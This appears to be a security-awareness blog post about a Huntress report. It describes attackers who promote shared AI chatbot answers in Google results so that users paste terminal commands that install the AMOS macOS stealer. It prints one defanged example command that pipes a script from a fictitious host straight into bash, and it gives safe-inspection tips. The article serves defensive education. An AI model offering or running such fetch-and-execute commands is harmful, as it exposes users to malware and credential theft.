Today, AI tools like ChatGPT, Grok, and Gemini have become part of everyday life. People use them to answer questions, solve technical problems, and make work easier. But cybercriminals have now started abusing these tools as well. A recent report by Huntress shows how a seemingly simple AI answer can trick people into installing malware.
The attack itself is carried out very cleverly. First, the attacker has an AI tool generate a command for some common task, and the AI returns a terminal command that looks entirely normal. The attacker then makes that AI conversation public and promotes it so that it ranks at the top of Google search results. When a user googles the same question, they see that same AI answer.
The trouble starts when the user copy-pastes that command straight into the terminal on their system without understanding it. In many cases, the command silently runs code that gives the attacker access to the machine.
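To make the trick concrete, here is a purely illustrative, defanged sketch of what such a one-liner can look like; the URL is fictitious. The command reads like a routine fix, but the pipe hands whatever the remote server returns straight to the shell, with no chance to review it:

```bash
# Looks like a harmless "repair" one-liner, but everything the server
# sends back is executed immediately, sight unseen.
curl -fsSL https://fix-mac-errors.example.com/repair.sh | bash
```

Attackers often obfuscate such commands further (for example with base64 encoding), so even a careful glance may reveal nothing obviously suspicious.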
This is exactly how the AMOS (Atomic macOS Stealer) malware was spread. What makes the technique notable is that no file has to be downloaded and no suspicious link has to be clicked; a single careless paste is enough.
This method is especially dangerous because it exploits habit and trust. People trust Google and AI tools, and they have seen tech experts share similar commands before. Against that backdrop, copying a single line of code feels completely normal, yet that one line can do real damage.
How to stay safe?
The most important rule for staying safe is never to run a command you do not understand. If you don't know what a command does, don't run it: check it first and, if necessary, test it in a safe environment.
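As a minimal sketch of what "check it first" can mean in practice (the URL and filename here are made up for illustration): download the script to disk and read it, and look up any unfamiliar tool in its manual, before executing anything.

```bash
# Save the script instead of piping it straight into the shell.
curl -fsSL https://fix-mac-errors.example.com/repair.sh -o repair.sh
less repair.sh        # read every line before deciding whether to run it

# Look up unfamiliar commands and flags before you execute them.
man xattr             # e.g. if the one-liner calls xattr, learn what it does
```

If the script still looks opaque, run it only inside a throwaway virtual machine, never on your main system.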
Always take instructions from official websites, vendor documentation, or trusted guides. Beyond that, avoid running commands with admin or root privileges, and keep your system updated. If there is even the slightest doubt, it is better to ask an expert than to take the risk.